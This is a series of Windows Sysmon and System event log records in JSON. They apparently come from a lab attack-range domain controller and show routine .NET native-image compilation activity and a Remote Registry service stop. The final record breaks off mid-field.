{"EventTime":"2020-08-01 05:56:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6197,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:56:41.242\r\nProcessGuid: {A837DB8D-0411-5F25-0000-0010346F0B00}\r\nProcessId: 4996\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1384-0\\System.dll\r\nCreationUtcTime: 2020-08-01 05:56:41.242","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:56:41.242","ProcessGuid":"{A837DB8D-0411-5F25-0000-0010346F0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1384-0\\System.dll","CreationUtcTime":"2020-08-01 05:56:41.242","EventReceivedTime":"2020-08-01 05:56:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6198,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:41.492\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0419-5F25-0000-00106E760B00}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:41.492","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0419-5F25-0000-00106E760B00}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6199,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:41.492\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0419-5F25-0000-00106E760B00}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:41.492","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0419-5F25-0000-00106E760B00}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6200,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:41.492\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0419-5F25-0000-00106E760B00}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:41.492","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0419-5F25-0000-00106E760B00}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6201,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:41.695\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0419-5F25-0000-0010BF790B00}\r\nTargetProcessId: 4320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:41.695","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0419-5F25-0000-0010BF790B00}","TargetProcessId":"4320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6202,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:41.695\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0419-5F25-0000-0010BF790B00}\r\nTargetProcessId: 4320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:41.695","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0419-5F25-0000-0010BF790B00}","TargetProcessId":"4320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6203,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:41.711\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0419-5F25-0000-0010BF790B00}\r\nTargetProcessId: 4320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:41.711","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0419-5F25-0000-0010BF790B00}","TargetProcessId":"4320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76863,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The Remote Registry service entered the stopped state.","param1":"Remote Registry","param2":"stopped","EventReceivedTime":"2020-08-01 05:56:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6204,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:56:47.352\r\nProcessGuid: {A837DB8D-0419-5F25-0000-0010BF790B00}\r\nProcessId: 4320\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10e0-0\\System.Xml.dll\r\nCreationUtcTime: 2020-08-01 05:56:47.352","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:56:47.352","ProcessGuid":"{A837DB8D-0419-5F25-0000-0010BF790B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10e0-0\\System.Xml.dll","CreationUtcTime":"2020-08-01 05:56:47.352","EventReceivedTime":"2020-08-01 05:56:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6205,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:47.492\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-041F-5F25-0000-00103D7F0B00}\r\nTargetProcessId: 4652\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:47.492","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-041F-5F25-0000-00103D7F0B00}","TargetProcessId":"4652","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0